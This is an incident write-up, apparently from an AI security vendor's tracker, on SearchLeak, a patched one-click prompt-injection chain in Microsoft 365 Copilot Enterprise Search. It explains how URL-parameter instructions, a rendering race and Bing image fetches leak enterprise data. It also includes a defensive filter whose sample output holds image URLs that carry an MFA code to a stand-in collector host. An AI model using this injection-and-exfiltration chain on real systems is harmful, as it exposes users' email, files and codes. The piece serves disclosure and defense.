Copilot SearchLeak Turns Search Into a Data Drain (CVE-2026-42824)
Key Takeaways
- Varonis disclosed a patched Microsoft 365 Copilot Enterprise Search vulnerability chain called SearchLeak.
- The attack combined parameter-to-prompt injection, rendering behavior, and Bing-mediated exfiltration.
- A victim needed only to click a crafted Microsoft-hosted link for sensitive search results to be exposed.
- Microsoft patched the issue and assigned CVE-2026-42824 with critical severity.
Summary
Microsoft 365 Copilot Enterprise Search became the center of a one-click data theft scenario when Varonis disclosed SearchLeak, a patched vulnerability chain tracked as CVE-2026-42824. The issue matters because Copilot can search across high-value enterprise data sources, so a successful exploit could convert trusted productivity search into an exfiltration path.
What We Know
On June 15, 2026, Varonis publicly described SearchLeak, a vulnerability chain in Microsoft 365 Copilot Enterprise Search that could allow an attacker to retrieve user-accessible enterprise data after a victim clicked a crafted Microsoft link. The report said the attack could reach Outlook, calendar entries, OneDrive files, SharePoint content, and MFA codes that appeared in indexed data. The Hacker News report summarized the issue as a one-click theft path, while Dark Reading coverage noted that the attack was patched before disclosure. The incident sits squarely within the AI application security category tracked by the PointGuard AI Security Incident Tracker, because it shows how enterprise copilots can become data brokers when prompt, search, browser rendering, and network controls are chained together. Public reporting indicates this was a demonstrated vulnerability rather than a confirmed breach campaign.
What Could Happen
SearchLeak combined several control failures into one practical exploit path. The attacker placed instructions in URL parameters that were interpreted by Copilot as search intent, creating a parameter-to-prompt injection. Copilot then retrieved sensitive results from the user’s enterprise context. A rendering race condition allowed an attacker-controlled image request to fire before sanitization, and Bing Search by Image behavior reportedly helped route the sensitive data outward. TechRadar coverage described this as a chain involving prompt injection, HTML rendering, and SSRF-like exfiltration through Bing. The AI-specific failure was not that Copilot accessed data incorrectly by itself. The core risk was that natural-language instructions, user-scoped enterprise search, and browser-executed output could be fused into a cross-boundary data flow. Traditional security tools may trust Microsoft-hosted links, while AI systems may trust user context too broadly.
Why It Matters
This incident is important because enterprise copilots collapse search, summarization, and action into one interface. Data that is technically available to a user may still be inappropriate to expose through a crafted external interaction. That distinction matters for privacy, insider risk, and regulatory governance. In a Microsoft 365 environment, the affected data classes can include email, files, meetings, security codes, customer information, contracts, and intellectual property. Even without confirmed real-world exploitation, the demonstrated path shows that AI applications need data-loss prevention and browser-aware output controls at runtime. Organizations adopting copilots should treat indirect instructions and trusted-domain links as meaningful attack surfaces, not just usability features. This also reinforces NIST AI RMF principles around mapping AI system context, measuring risk, and managing downstream harm when models operate over sensitive business data.
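One form the browser-aware output control mentioned above can take, as an added example that is not code from Varonis, Microsoft, or PointGuard AI: model output is checked for image references before it is handed to the renderer, and a host allowlist alone is not treated as sufficient, because the reported chain routed data through a trusted service. The host names, the query-length budget, and the sample output are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumptions: constructed hosts. relay.trusted.example stands in for a trusted
# service that fetches whatever URL it is handed in a parameter.
ALLOWED_IMAGE_HOSTS = {"static.corp.example", "relay.trusted.example"}
MAX_QUERY_CHARS = 64  # assumed budget for a legitimate image query string
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)")
HTML_IMAGE = re.compile(r"<img\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)[^>]*>", re.I)
NESTED_URL = re.compile(r"(?:https?:)?//", re.I)

# Constructed model output: one benign image and two exfiltration-style ones.
SAMPLE_OUTPUT = (
    "Summary of results.\n"
    "![logo](https://static.corp.example/logo.png)\n"
    "![x](https://collector.example/p.png?d=MFA-123456)\n"
    '<img src="https://relay.trusted.example/fetch'
    '?u=https%3A%2F%2Fcollector.example%2F%3Fd%3DMFA-123456">\n'
)

def image_url_verdict(url):
    """Return (allowed, reason) for one image URL found in model output."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    host = (parts.hostname or "").lower()
    if parts.scheme != "https" or not host:
        return False, "not an absolute https URL"
    if host not in ALLOWED_IMAGE_HOSTS:
        return False, "host not on image allowlist"
    # parse_qsl decodes once; unquote again to catch double-encoded values.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if NESTED_URL.search(unquote(value)):
            return False, "nested URL in query parameter"
    if len(parts.query) > MAX_QUERY_CHARS:
        return False, "query string long enough to carry data"
    return True, "ok"

def neutralize_images(model_output):
    """Replace disallowed image references with inert text before rendering."""
    findings = []
    def check(match):
        allowed, reason = image_url_verdict(match.group(1))
        if allowed:
            return match.group(0)
        findings.append((match.group(1), reason))
        return "[image removed: " + reason + "]"
    text = HTML_IMAGE.sub(check, MD_IMAGE.sub(check, model_output))
    return text, findings
```

Data can also ride in the path of an allowlisted URL, which this check does not inspect; the findings list is what a guardrail would log for investigation.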
PointGuard AI Perspective
SearchLeak highlights why PointGuard AI treats runtime behavior, identity context, and data movement as one security problem. The PointGuard AI Runtime Guardrails are designed to inspect prompts and responses inline, identify prompt injection patterns, and enforce policy before sensitive outputs are returned or transmitted. For agentic and copilot-style workflows, the PointGuard AI Agent Control Plane adds identity-aware validation so every agent, user, action, and data request can be evaluated before execution. The Prompt Injection vs. Indirect Prompt Injection article explains why visible and hidden prompt instructions must be governed differently from normal application input. In this scenario, PointGuard AI would focus on detecting suspicious prompt construction, blocking unauthorized data retrieval patterns, and preventing model-mediated exfiltration. It also gives security teams a record of which AI system accessed which data source, under which identity, and for what purpose. That evidence is essential for investigation, compliance, and continuous improvement. As enterprises expand copilots across productivity suites, trustworthy adoption depends on runtime enforcement that travels with the AI workflow, not only perimeter filtering around it.
Incident Scorecard Details
Total AISSI Score: 7.3/10
- Criticality = 8.5 (AISSI weighting: 25%): Sensitive enterprise email, files, calendar data, and MFA-related information could be exposed.
- Propagation = 7.5 (AISSI weighting: 20%): The pattern can recur across copilots that combine search, rendering, and external links.
- Exploitability = 5.5 (AISSI weighting: 15%): A public exploit chain was demonstrated, but broad exploitation has not been confirmed.
- Supply Chain = 8.0 (AISSI weighting: 15%): The issue depends on a hosted enterprise AI platform and connected Microsoft services.
- Business Impact = 6.5 (AISSI weighting: 25%): High-risk exposure without confirmed customer harm or regulatory action at initial reporting.
Sources
- The Hacker News: One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
- Dark Reading: Copilot SearchLeak Attack Allows 1-Click Data Theft
- TechRadar: Microsoft 365 Copilot can be turned into a one-click data theft tool
- PointGuard AI Security Incident Tracker
- PointGuard AI Runtime Guardrails
- PointGuard AI Agent Control Plane
- Prompt Injection vs. Indirect Prompt Injection
